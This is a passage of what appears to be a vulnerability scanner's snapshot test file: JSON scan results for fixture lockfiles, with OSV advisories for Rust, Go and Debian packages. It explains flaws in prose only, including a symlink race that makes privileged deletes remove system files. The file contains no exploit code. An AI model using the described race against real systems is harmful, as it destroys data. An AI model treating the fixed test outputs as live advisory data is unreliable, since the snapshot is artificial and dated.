"type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26235" }, { "type": "WEB", "url": "https://github.com/time-rs/time/issues/293" }, { "type": "WEB", "url": "https://crates.io/crates/time/0.2.23" }, { "type": "PACKAGE", "url": "https://github.com/time-rs/time" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" } ], "schema_version": "1.4.0", "summary": "Segmentation fault in time" }, { "affected": [ { "database_specific": { "categories": [ "code-execution", "memory-corruption" ], "cvss": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2020-0071.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local", "time::UtcOffset::current_local_offset", "time::UtcOffset::local_offset_at", "time::UtcOffset::try_current_local_offset", "time::UtcOffset::try_local_offset_at", "time::at", "time::at_utc", "time::now" ], "os": [ "linux", "redox", "solaris", "android", "ios", "macos", "netbsd", "openbsd", "freebsd" ] } }, "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.2.0" }, { "introduced": "0.2.1-0" }, { "fixed": "0.2.1" }, { "introduced": "0.2.2-0" }, { "fixed": "0.2.2" }, { "introduced": "0.2.3-0" }, { "fixed": "0.2.3" }, { "introduced": "0.2.4-0" }, { "fixed": "0.2.4" }, { "introduced": "0.2.5-0" }, { "fixed": "0.2.5" }, { "introduced": "0.2.6-0" }, { "fixed": "0.2.6" }, { "introduced": "0.2.7-0" }, { "fixed": "0.2.23" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2020-26235" ], "details": "### Impact\n\nUnix-like operating systems may segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nPending a proper fix, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods.\n\nUsers and library authors with time in their dependency tree should perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and should upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nA possible workaround for crates affected through the transitive dependency in `chrono`, is to avoid using the default `oldtime` feature dependency of the `chrono` crate by disabling its `default-features` and manually specifying the required features instead.\n\n#### Examples:\n\n`Cargo.toml`: \n\n```toml\nchrono = { version = \"0.4\", default-features = false, features = [\"serde\"] }\n```\n\n```toml\nchrono = { version = \"0.4.22\", default-features = false, features = [\"clock\"] }\n```\n\nCommandline: \n\n```bash\ncargo add chrono --no-default-features -F clock\n```\n\nSources: \n - [chronotope/chrono#602 (comment)](https://github.com/chronotope/chrono/issues/602#issuecomment-1242149249) \n - [vityafx/serde-aux#21](https://github.com/vityafx/serde-aux/issues/21)", "id": "RUSTSEC-2020-0071", "modified": "2023-02-08T15:06:38Z", "published": "2020-11-18T12:00:00Z", "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/time" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" }, { "type": "REPORT", "url": "https://github.com/time-rs/time/issues/293" } ], "schema_version": "1.4.0", "summary": "Potential segfault in the time crate" } ] } ] }, { "source": { "path": "testdata/filter/none/configs/b/", "type": "lockfile" }, "packages": [ { "package": { "name": "golang.org/x/net", "version": "0.1.0", "ecosystem": "Go" }, "groups": [ { "ids": [ "GHSA-fxg5-wq6x-vr4w", "GO-2023-1495" ], "aliases": [ "GHSA-fxg5-wq6x-vr4w", "GO-2023-1495" ], "max_severity": "" }, { "ids": [ "GO-2022-1144" ], "aliases": [ "GO-2022-1144" ], "max_severity": "" }, { "ids": [ "GHSA-vvpx-j8f3-3w6h", "GO-2023-1571" ], "aliases": [ "GHSA-vvpx-j8f3-3w6h", "GO-2023-1571" ], "max_severity": "" } ], "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/01/GHSA-fxg5-wq6x-vr4w/GHSA-fxg5-wq6x-vr4w.json" }, "package": { "ecosystem": "Go", "name": "golang.org/x/net/http2/h2c", "purl": "pkg:golang/golang.org/x/net/http2/h2c" }, "ranges": [ { "events": [ { "introduced": "0.0.0-20220524220425-1d687d428aca" }, { "fixed": "0.1.1-0.20221104162952-702349b0e862" } ], "type": "SEMVER" } ] }, { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/01/GHSA-fxg5-wq6x-vr4w/GHSA-fxg5-wq6x-vr4w.json" }, "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "events": [ { "introduced": "0.0.0-20220524220425-1d687d428aca" }, { "fixed": "0.1.1-0.20221104162952-702349b0e862" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2022-41721" ], "database_specific": { "cwe_ids": [ "CWE-444" ], "github_reviewed": true, "github_reviewed_at": "2023-01-20T22:40:06Z", "nvd_published_at": "2023-01-13T23:15:00Z", "severity": "HIGH" }, "details": "A request smuggling attack is possible when using MaxBytesHandler. When using MaxBytesHandler, the body of an HTTP request is not fully consumed. When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent arbitrary HTTP2 requests.", "id": "GHSA-fxg5-wq6x-vr4w", "modified": "2023-01-24T18:56:46Z", "published": "2023-01-14T00:30:23Z", "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41721" }, { "type": "PACKAGE", "url": "https://cs.opensource.google/go/x/net" }, { "type": "WEB", "url": "https://go.dev/cl/447396" }, { "type": "WEB", "url": "https://go.dev/issue/56352" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1495" } ], "schema_version": "1.4.0", "summary": "golang.org/x/net/http2/h2c vulnerable to request smuggling attack" }, { "affected": [ { "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1495.json", "url": "https://pkg.go.dev/vuln/GO-2023-1495" }, "ecosystem_specific": { "imports": [ { "path": "golang.org/x/net/http2/h2c", "symbols": [ "h2cHandler.ServeHTTP", "h2cUpgrade" ] } ] }, "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "events": [ { "introduced": "0.0.0-20220524220425-1d687d428aca" }, { "fixed": "0.1.1-0.20221104162952-702349b0e862" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2022-41721", "GHSA-fxg5-wq6x-vr4w" ], "details": "A request smuggling attack is possible when using MaxBytesHandler.\n\nWhen using MaxBytesHandler, the body of an HTTP request is not fully consumed. When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent arbitrary HTTP2 requests.", "id": "GO-2023-1495", "modified": "2023-01-31T21:39:17Z", "published": "2023-01-13T22:39:40Z", "references": [ { "type": "REPORT", "url": "https://go.dev/issue/56352" }, { "type": "FIX", "url": "https://go.dev/cl/447396" } ], "schema_version": "1.4.0" }, { "affected": [ { "database_specific": { "source": "https://vuln.go.dev/ID/GO-2022-1144.json", "url": "https://pkg.go.dev/vuln/GO-2022-1144" }, "ecosystem_specific": { "imports": [ { "path": "net/http", "symbols": [ "ListenAndServe", "ListenAndServeTLS", "Serve", "ServeTLS", "Server.ListenAndServe", "Server.ListenAndServeTLS", "Server.Serve", "Server.ServeTLS", "http2Server.ServeConn", "http2serverConn.canonicalHeader" ] } ] }, "package": { "ecosystem": "Go", "name": "stdlib", "purl": "pkg:golang/stdlib" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.18.9" }, { "introduced": "1.19.0" }, { "fixed": "1.19.4" } ], "type": "SEMVER" } ] }, { "database_specific": { "source": "https://vuln.go.dev/ID/GO-2022-1144.json", "url": "https://pkg.go.dev/vuln/GO-2022-1144" }, "ecosystem_specific": { "imports": [ { "path": "golang.org/x/net/http2", "symbols": [ "Server.ServeConn", "serverConn.canonicalHeader" ] } ] }, "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "0.4.0" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2022-41717", "GHSA-xrjj-mj9h-534m" ], "details": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests.\n\nHTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", "id": "GO-2022-1144", "modified": "2023-01-31T21:39:15Z", "published": "2022-12-08T19:01:21Z", "references": [ { "type": "REPORT", "url": "https://go.dev/issue/56350" }, { "type": "FIX", "url": "https://go.dev/cl/455717" }, { "type": "FIX", "url": "https://go.dev/cl/455635" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ" } ], "schema_version": "1.4.0" }, { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-vvpx-j8f3-3w6h/GHSA-vvpx-j8f3-3w6h.json" }, "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "0.7.0" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2022-41723" ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2023-02-17T14:00:02Z", "nvd_published_at": "2023-02-28T18:15:00Z", "severity": "HIGH" }, "details": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", "id": "GHSA-vvpx-j8f3-3w6h", "modified": "2023-03-09T21:20:44Z", "published": "2023-02-17T14:00:02Z", "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723" }, { "type": "WEB", "url": "https://go.dev/cl/468135" }, { "type": "WEB", "url": "https://go.dev/cl/468295" }, { "type": "WEB", "url": "https://go.dev/issue/57855" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1571" }, { "type": "WEB", "url": "https://vuln.go.dev/ID/GO-2023-1571.json" } ], "schema_version": "1.4.0", "summary": "Uncontrolled Resource Consumption" }, { "affected": [ { "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1571.json", "url": "https://pkg.go.dev/vuln/GO-2023-1571" }, "ecosystem_specific": { "imports": [ { "path": "net/http" } ] }, "package": { "ecosystem": "Go", "name": "stdlib", "purl": "pkg:golang/stdlib" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.19.6" }, { "introduced": "1.20.0" }, { "fixed": "1.20.1" } ], "type": "SEMVER" } ] }, { "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1571.json", "url": "https://pkg.go.dev/vuln/GO-2023-1571" }, "ecosystem_specific": { "imports": [ { "path": "golang.org/x/net/http2" }, { "path": "golang.org/x/net/http2/hpack", "symbols": [ "Decoder.DecodeFull", "Decoder.Write", "Decoder.parseFieldLiteral", "Decoder.readString" ] } ] }, "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "0.7.0" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2022-41723", "GHSA-vvpx-j8f3-3w6h" ], "details": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", "id": "GO-2023-1571", "modified": "2023-02-22T20:13:12Z", "published": "2023-02-16T22:31:36Z", "references": [ { "type": "REPORT", "url": "https://go.dev/issue/57855" }, { "type": "FIX", "url": "https://go.dev/cl/468135" }, { "type": "FIX", "url": "https://go.dev/cl/468295" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E" } ], "schema_version": "1.4.0" } ] } ] }, { "source": { "path": "testdata/filter/none/configs/c/", "type": "lockfile" }, "packages": [ { "package": { "name": "ascii", "version": "0.8.7", "ecosystem": "crates.io" }, "groups": [ { "ids": [ "GHSA-mrrw-grhq-86gf" ], "aliases": [ "GHSA-mrrw-grhq-86gf" ], "max_severity": "" }, { "ids": [ "RUSTSEC-2023-0015" ], "aliases": [ "RUSTSEC-2023-0015" ], "max_severity": "" } ], "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-mrrw-grhq-86gf/GHSA-mrrw-grhq-86gf.json" }, "package": { "ecosystem": "crates.io", "name": "ascii", "purl": "pkg:cargo/ascii" }, "ranges": [ { "events": [ { "introduced": "0.6.0" }, { "fixed": "0.9.3" } ], "type": "SEMVER" } ] } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2023-02-28T20:30:10Z", "nvd_published_at": null, "severity": "MODERATE" }, "details": "Affected version of this crate had implementation of `From\u003c\u0026mut AsciiStr\u003e` for `\u0026mut [u8]` and `\u0026mut str`. This can result in out-of-bounds array indexing in safe code.\n\nThe flaw was corrected in commit [8a6c779](https://github.com/tomprogrammer/rust-ascii/pull/63/commits/8a6c7798c202766bd57d70fb8d12739dd68fb9dc) by removing those impls.\n", "id": "GHSA-mrrw-grhq-86gf", "modified": "2023-02-28T20:30:10Z", "published": "2023-02-28T20:30:10Z", "references": [ { "type": "WEB", "url": "https://github.com/tomprogrammer/rust-ascii/issues/64" }, { "type": "WEB", "url": "https://github.com/tomprogrammer/rust-ascii/pull/63/commits/8a6c7798c202766bd57d70fb8d12739dd68fb9dc" }, { "type": "PACKAGE", "url": "https://github.com/tomprogrammer/rust-ascii" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0015.html" } ], "schema_version": "1.4.0", "summary": "Ascii (crate) allows out-of-bounds array indexing in safe code" }, { "affected": [ { "database_specific": { "categories": [ "memory-corruption" ], "cvss": null, "informational": "unsound", "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2023-0015.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [], "os": [] } }, "package": { "ecosystem": "crates.io", "name": "ascii", "purl": "pkg:cargo/ascii" }, "ranges": [ { "events": [ { "introduced": "0.6.1-0" }, { "fixed": "0.9.3" } ], "type": "SEMVER" } ] } ], "details": "Affected version of this crate had implementation of `From\u003c\u0026mut AsciiStr\u003e` for `\u0026mut [u8]` and `\u0026mut str`. This can result in out-of-bounds array indexing in safe code.\n\nThe flaw was corrected in commit [8a6c779](https://github.com/tomprogrammer/rust-ascii/pull/63/commits/8a6c7798c202766bd57d70fb8d12739dd68fb9dc) by removing those impls.", "id": "RUSTSEC-2023-0015", "modified": "2023-02-25T15:13:09Z", "published": "2023-02-25T12:00:00Z", "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/ascii" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0015.html" }, { "type": "REPORT", "url": "https://github.com/tomprogrammer/rust-ascii/issues/64" } ], "schema_version": "1.4.0", "summary": "Ascii allows out-of-bounds array indexing in safe code" } ] }, { "package": { "name": "remove_dir_all", "version": "0.5.3", "ecosystem": "crates.io" }, "groups": [ { "ids": [ "GHSA-mc8h-8q98-g5hr", "RUSTSEC-2023-0018" ], "aliases": [ "GHSA-mc8h-8q98-g5hr", "RUSTSEC-2023-0018" ], "max_severity": "" } ], "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-mc8h-8q98-g5hr/GHSA-mc8h-8q98-g5hr.json" }, "package": { "ecosystem": "crates.io", "name": "remove_dir_all", "purl": "pkg:cargo/remove_dir_all" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "0.8.0" } ], "type": "SEMVER" } ] } ], "database_specific": { "cwe_ids": [ "CWE-366", "CWE-367" ], "github_reviewed": true, "github_reviewed_at": "2023-02-24T16:23:59Z", "nvd_published_at": null, "severity": "LOW" }, "details": "The `remove_dir_all` crate is a Rust library that offers additional features over the Rust standard library `fs::remove_dir_all` function. It suffers the same class of failure as the code it was layering over: TOCTOU race conditions, with the ability to cause arbitrary paths to be deleted by substituting a symlink for a path after the type of the path was checked.\n\nThanks to the Rust security team for identifying the problem and alerting us to it.", "id": "GHSA-mc8h-8q98-g5hr", "modified": "2023-02-24T16:23:59Z", "published": "2023-02-24T16:23:59Z", "references": [ { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/security/advisories/GHSA-mc8h-8q98-g5hr" }, { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/commit/7247a8b6ee59fc99bbb69ca6b3ca4bfd8c809ead" }, { "type": "PACKAGE", "url": "https://github.com/XAMPPRocky/remove_dir_all" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0018.html" } ], "schema_version": "1.4.0", "summary": "Race Condition Enabling Link Following and Time-of-check Time-of-use (TOCTOU) Race Condition in remove_dir_all" }, { "affected": [ { "database_specific": { "categories": [], "cvss": null, "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2023-0018.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "remove_dir_all::ensure_empty_dir", "remove_dir_all::remove_dir_all", "remove_dir_all::remove_dir_contents" ], "os": [] } }, "package": { "ecosystem": "crates.io", "name": "remove_dir_all", "purl": "pkg:cargo/remove_dir_all" }, "ranges": [ { "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.8.0" } ], "type": "SEMVER" } ] } ], "aliases": [ "GHSA-mc8h-8q98-g5hr" ], "details": "The remove_dir_all crate is a Rust library that offers additional features over the Rust\nstandard library fs::remove_dir_all function.\n\nIt was possible to trick a privileged process doing a recursive delete in an\nattacker controlled directory into deleting privileged files, on all operating systems.\n\nFor instance, consider deleting a tree called 'etc' in a parent directory\ncalled 'p'. Between calling `remove_dir_all(\"a\")` and remove_dir_all(\"a\")\nactually starting its work, the attacker can move 'p' to 'p-prime', and\nreplace 'p' with a symlink to '/'. Then the privileged process deletes 'p/etc'\nwhich is actually /etc, and now your system is broken. There are some\nmitigations for this exact scenario, such as CWD relative file lookup, but\nthey are not guaranteed - any code using absolute paths will not have that\nprotection in place.\n\nThe same attack could be performed at any point in the directory tree being\ndeleted: if 'a' contains a child directory called 'etc', attacking the\ndeletion by replacing 'a' with a link is possible.\n\nThe new code in this release mitigates the attack within the directory tree\nbeing deleted by using file-handle relative operations: to open 'a/etc', the\npath 'etc' relative to 'a' is opened, where 'a' is represented by a file\ndescriptor (Unix) or handle (Windows). With the exception of the entry points\ninto the directory deletion logic, this is robust against manipulation of the\ndirectory hierarchy, and remove_dir_all will only delete files and directories\ncontained in the tree it is deleting.\n\nThe entry path however is a challenge - as described above, there are some\npotential mitigations, but since using them must be done by the calling code,\nit is hard to be confident about the security properties of the path based\ninterface.\n\nThe new extension trait `RemoveDir` provides an interface where it is much\nharder to get it wrong.\n\n`somedir.remove_dir_contents(\"name-of-child\")`.\n\nCallers can then make their own security evaluation about how to securely get\na directory handle. That is still not particularly obvious, and we're going to\nfollow up with a helper of some sort (probably in the `fs_at` crate). Once\nthat is available, the path based entry points will get deprecated.\n\nIn the interim, processes that might run with elevated privileges should\nfigure out how to securely identify the directory they are going to delete, to\navoid the initial race. Pragmatically, other processes should be fine with the\npath based entry points : this is the same interface `std::fs::remove_dir_all`\noffers, and an unprivileged process running in an attacker controlled\ndirectory can't do anything that the attacker can't already do.", "id": "RUSTSEC-2023-0018", "modified": "2023-03-04T21:50:30Z", "published": "2023-02-24T12:00:00Z", "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/remove_dir_all" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0018.html" }, { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/commit/7247a8b6ee59fc99bbb69ca6b3ca4bfd8c809ead" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-mc8h-8q98-g5hr" } ], "schema_version": "1.4.0", "summary": "Race Condition Enabling Link Following and Time-of-check Time-of-use (TOCTOU)" } ] }, { "package": { "name": "time", "version": "0.1.45", "ecosystem": "crates.io" }, "groups": [ { "ids": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ], "aliases": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ], "max_severity": "" } ], "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" }, "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "events": [ { "introduced": "0.1" }, { "last_affected": "0.2" } ], "type": "SEMVER" } ] }, { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" }, "ecosystem_specific": { "affected_functions": [ "time::UtcOffset::local_offset_at", "time::UtcOffset::try_local_offset_at", "time::UtcOffset::current_local_offset", "time::UtcOffset::try_current_local_offset", "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local" ] }, "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "events": [ { "introduced": "0.2.7" }, { "fixed": "0.2.23" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2020-26235" ], "database_specific": { "cwe_ids": [ "CWE-476" ], "github_reviewed": true, "severity": "MODERATE" }, "details": "### Impact\n\nUnix-like operating systems may segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nIn some versions of `time`, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods. In later versions, `time` will attempt to determine the number of threads running in the process. If the process is single-threaded, the call will proceed as its safety invariant is upheld.\n\nUsers and library authors with time in their dependency tree must perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and must upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nLibrary authors must ensure that the program only has one running thread at the time of calling any affected method. Binary authors may do the same and/or ensure that no other thread is actively mutating the environment.\n\n### References\n\n[time-rs/time#293](https://github.com/time-rs/time/issues/293).", "id": "GHSA-wcg3-cvx6-7396", "modified": "2022-12-06T00:16:25Z", "published": "2021-08-25T20:56:46Z", "references": [ { "type": "WEB", "url": "https://github.com/time-rs/time/security/advisories/GHSA-wcg3-cvx6-7396" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26235" }, { "type": "WEB", "url": "https://github.com/time-rs/time/issues/293" }, { "type": "WEB", "url": "https://crates.io/crates/time/0.2.23" }, { "type": "PACKAGE", "url": "https://github.com/time-rs/time" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" } ], "schema_version": "1.4.0", "summary": "Segmentation fault in time" }, { "affected": [ { "database_specific": { "categories": [ "code-execution", "memory-corruption" ], "cvss": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2020-0071.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local", "time::UtcOffset::current_local_offset", "time::UtcOffset::local_offset_at", "time::UtcOffset::try_current_local_offset", "time::UtcOffset::try_local_offset_at", "time::at", "time::at_utc", "time::now" ], "os": [ "linux", "redox", "solaris", "android", "ios", "macos", "netbsd", "openbsd", "freebsd" ] } }, "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.2.0" }, { "introduced": "0.2.1-0" }, { "fixed": "0.2.1" }, { "introduced": "0.2.2-0" }, { "fixed": "0.2.2" }, { "introduced": "0.2.3-0" }, { "fixed": "0.2.3" }, { "introduced": "0.2.4-0" }, { "fixed": "0.2.4" }, { "introduced": "0.2.5-0" }, { "fixed": "0.2.5" }, { "introduced": "0.2.6-0" }, { "fixed": "0.2.6" }, { "introduced": "0.2.7-0" }, { "fixed": "0.2.23" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2020-26235" ], "details": "### Impact\n\nUnix-like operating systems may segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nPending a proper fix, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods.\n\nUsers and library authors with time in their dependency tree should perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and should upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nA possible workaround for crates affected through the transitive dependency in `chrono`, is to avoid using the default `oldtime` feature dependency of the `chrono` crate by disabling its `default-features` and manually specifying the required features instead.\n\n#### Examples:\n\n`Cargo.toml`: \n\n```toml\nchrono = { version = \"0.4\", default-features = false, features = [\"serde\"] }\n```\n\n```toml\nchrono = { version = \"0.4.22\", default-features = false, features = [\"clock\"] }\n```\n\nCommandline: \n\n```bash\ncargo add chrono --no-default-features -F clock\n```\n\nSources: \n - [chronotope/chrono#602 (comment)](https://github.com/chronotope/chrono/issues/602#issuecomment-1242149249) \n - [vityafx/serde-aux#21](https://github.com/vityafx/serde-aux/issues/21)", "id": "RUSTSEC-2020-0071", "modified": "2023-02-08T15:06:38Z", "published": "2020-11-18T12:00:00Z", "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/time" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" }, { "type": "REPORT", "url": "https://github.com/time-rs/time/issues/293" } ], "schema_version": "1.4.0", "summary": "Potential segfault in the time crate" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [Test_filterResults/filter_partially - 1] { "results": [ { "source": { "path": "testdata/filter/some/configs/a/", "type": "lockfile" }, "packages": [ { "package": { "name": "unixodbc", "version": "2.3.11-2", "ecosystem": "Debian:10" }, "groups": [ { "ids": [ "CVE-2024-1013" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "affected": [ { "ecosystem_specific": { "urgency": "unimportant" }, "package": { "ecosystem": "Debian:10", "name": "unixodbc" }, "ranges": [ { "events": [ { "introduced": "0" } ], "type": "ECOSYSTEM" } ] } ], "details": "An out-of-bounds stack write flaw was found in unixODBC on 64-bit architectures where the caller has 4 bytes and callee writes 8 bytes. This issue may go unnoticed on little-endian architectures, while big-endian architectures can be broken.", "id": "CVE-2024-1013", "modified": "2024-03-18T12:38:25Z", "published": "2024-03-18T11:15:09Z", "references": [ { "type": "REPORT", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2260823" }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2024-1013" }, { "type": "WEB", "url": "https://github.com/lurcher/unixODBC/pull/157" } ] } ] }, { "package": { "name": "chromium", "version": "73.0.3683.75-1", "ecosystem": "Debian:10" }, "groups": [ { "ids": [ "CVE-2024-3847" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "affected": [ { "ecosystem_specific": { "urgency": "low" }, "package": { "ecosystem": "Debian:10", "name": "chromium" }, "ranges": [ { "events": [ { "introduced": "0" } ], "type": "ECOSYSTEM" } ] }, { "ecosystem_specific": { "urgency": "low" }, "package": { "ecosystem": "Debian:11", "name": "chromium" }, "ranges": [ { "events": [ { "introduced": "0" } ], 